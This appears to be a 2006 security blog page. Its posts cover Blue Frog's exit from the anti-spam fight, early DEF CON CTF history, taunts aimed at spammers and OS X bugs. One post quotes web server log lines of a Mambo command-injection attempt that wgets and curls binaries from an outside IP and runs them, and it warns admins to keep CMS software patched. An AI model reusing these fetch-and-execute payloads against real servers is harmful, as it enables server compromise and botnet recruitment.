Blue Frog drops out of war

Blue Frog dropped out of the war against spammers citing that “It’s clear to us that [quitting] would be the only thing to prevent a full-scale cyber-war that we just don’t have the authority to start,” Reshef said. “Our users never signed up for this kind of thing.” The article also states that “tens of thousands of hijacked computers [were used to flood] Blue Security”. I would bet that all ten thousand ran Windows which were installed from pirated copies. Remember when Microsoft decided to drop support of updates to those “pirates”? Thanks for the spam MS. Seriously.

UPDATE: 20060527 Black Frog is rising up in Blues place. Source code donated.

The first defcons

The first defcons have recently come up for debate. The founder of nCircle thought he was the first winner of the CTF contest.

“Moss recalls that another individual won the first two Capture the Flag contests. “It was this guy called A.J. Reznor, who won it in a pretty famous way,” Moss says. “This guy won it with no monitor, attacking the machine with a keyboard only. He memorized the entire attack and did it.””

AJ was last seen battling it out with ISC^2 over the CISSP cert. Which for the record I do not have.


zero:~ zeroy$ ls -lah Desktop
total 359320
drwx—— 19 zero zero 646B May 12 11:56 .
drwxr-xr-x 68 zero zero 2K May 9 01:48 ..
-rw——- 1 zero zero 42K May 12 11:56 .DS_Store
-rw-r–r– 1 zero zero 0B Nov 6 2005 .localized
-rw——- 1 zero zero 20K Apr 2 21:24 .results_nigeria_wordlist_global.xml.swp
-rw-r–r– 1 zero zero 15M May 9 13:49 2-04 Let Me Look At You.mp3
-rw-r–r– 1 zero zero 0B Jan 14 12:14 Harvard
-rw-rw-rw- 1 zero zero 0B Apr 15 05:23 ONI
-rw-rw-rw- 1 zero zero 141K May 11 17:43 decayed hip hop.rns
-rw-rw-rw- 1 zero zero 22M May 11 16:33 decayed_hiphop.wav
-rw-rw-rw- 1 zero zero 22M May 11 18:09 fuzzed out beats (now with bass).wav
-rw-rw-rw- 1 zero zero 141K May 12 11:20 fuzzed out beats.rns
-rw-rw-rw- 1 zero zero 22M May 11 17:53 fuzzed out beats.wav
-rw-rw-rw- 1 zero zero 22M May 12 11:21 fuzzed out beats_2.wav
-rw-rw-rw- 1 zero zero 141K May 11 17:57 fuzzy beats.rns
-rw-rw-rw- 1 zero zero 22M May 11 16:40 fuzzy beats.wav
-rw-r–r– 1 zero zero 2M May 12 10:23 fuzzy_beats.mp3
-rw-rw-rw- 1 zero zero 44M May 11 16:27 glitch.wav
-rw-r–r– 1 zero zero 1M May 11 16:42 screenshot_200605.png

Spam Wars Escalate

Spammers are getting really pissed off at the Blue Frog team for their coordinated distributive complaint system. I’m reposting some of the banter incase they close up the logins that have been floating around. I can’t imagine they are used to having light shed on their operations.

From “That Guy”elitemort at a “Respected Member” on
Another spammer named “Dollar”swank at who is a “top rated gumshoe” is offended:

From “That Guy”elitemort at a “Respected Member” on
Finally we have a Blue Frog member who posted to taunt them further.

Yeah, remember who your enemy is alright guys? 

Me. And all the other guys like me. 

Though it really shows what a team you guys are that you start tearing each others heads 
off first chance you get. ROFL. 

We blue froggers have been reading this forum and having a complete blast. This is just 
too fun! Keep it up gents. My spam levels have certainly peaked because of your collective 
hatred, but I want more!! Is that all you got?? Come on. You can hit me with 5 or 10k per 
day cantcha? So sorry, ain't got the juice? 

Can't afford the bandwidth? Come on - hawk that old Hyundai you been driving and buy 
some hardware. Go out and jack some more 486's for your bot net. Scared of a half million 
BF clients pounding on your door? Don't be, you're big and bad and all that. We can clearly 
see that from your endless wise words. 

Just remember: 
-Your sponsors won't get a penny from my kind 
-Your resources and contacts are going up in smoke 
-Every UCE I get is a UCE that didn't go out to a real mark 
-Not one click through - I'm a walking talking black hole baby. 
-Blue Security will get each and every message you send up to your limit to send. 
-They will guide our frogs and we will find your cash pots. 
-And we're never gonna stop. 
-Unless of course you clean your lists. 

Then we'll stop. It's pretty simple really. 

But you wanna fight! You're to proud for list cleaning. Don't give up! You'd rather go out 
in a ball of fire right? That's cool, a mans gotta stick by his guns. 

And you've all got a lot invested in this fight I guess. Me? Well who cares? I'm in it for the 

See, this is just a hobby for us. We don't make money from it. I get my 6 figures the hard 
way - by working for a living. You guys? Come on - don't lie and tell me that your mama's 
proud of you.. (My boys a spam lord, we're so proud. He even has a little Hormel Hat he 
wears.. Gold plated.) 

But you my friends.. We frogs are messing with your ability to pay rent. You spend all your 
time fighting us, when you gonna make enough money to buy blow for all your bitches? 

Keep it up chumps. I don't want this fun to end. And by all means do your verbal best use 
every adjective you can think of against me. I'll still be munchin your spam on toast. 

With tea. 

What, did I make wittle you mad? Can't you tell I'm taunting you? Mad is what I'm trying to 
make you? If you spend all your time flaming on boards like this, when you gonna twiddle 
with your spamware? Oh by all means hunt down my IP number and plan vendetta attacks. 
Show me how bad you are with your reverse lookups. 

Fu-real gents. Get a job. And hopefully you're all re-united against me now. ;) Set asside 
your lovers quarrels and come get me. Come get all of us Frogs. 


Interesting attacks on my web server

Still think that firewall is enough to protect your web server? Port 80 to the rescue!
Through a combination of curl, wget and various shell commands this “URL” is a sneaky little rootkit. I haven’t had time to download the executables and rip them apart but something tells me that after all is said and done… you end up on some IRC server in Brazil. Call it a hunch. – – [25/Apr/2006:10:08:10 -0700] “GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1” 404 1044 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)” – – [25/Apr/2006:10:08:11 -0700] “GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1” 404 1044 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)” – – [25/Apr/2006:10:08:12 -0700] “GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1” 404 1044 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)” also noticed this traffic back in March.
All of them, as we can see, are exploitation attempts to known bugged
pages (like the newest Mambo bug, the old XMLRPC problem with old
versions of Drupal, etc). I guess that they are getting a list of
domain names and trying them out with those vulns, and I believe that
they may already have some thousands of vuln machines in their hands.
Such attacks might been enhanced by using Google to guess which
domains are using which CMS… for example, looking on Google for “A
password and instructions will be sent to this e-mail address, so make
sure it is accurate.” will return a bunch of Drupal websites (88,500
according to Google, even though we can see just the first 1000 ones).

This is just an advise for all admins that use those CMS, to keep, as
always, your CMS updated (almost every two weeks there are new vulns
disclosed), and also, check if you already got caught by that, if
you’re running old software.

The most interesting comment here is the use of Google to hone the attacks. There is even a book on the market that talks about hacking with google. One of the more novel methods was extracting credit card numbers. Before anyone wonders whether Google gets sued over the random crimes committed by others using Google look no further.

More details found on a forum regarding the make up of this root kit:

 another botnet irc client:  

Latest on OS X research

Tom Ferris, noted security researcher, has listed a series of new bugs to come out for OS X. it’s an interesting mixture of bugs which consists of mostly Heap Overflows. This is scary for those who would like to think that their OS X machine is 100% safe from malware. The media doesn’t always help with alarmist reactions and Apple doesn’t help much with it’s defensive posture. The truth, as is almost always the case, lies in the parallax of the two sources. OS X has received a lot more attention these days and thus more bugs have been found. While the technical underpinnings of OS X *are* in fact more solid then Windows it doesn’t mean that the OS is “virus free” or “immune from hackers/crackers/etc”.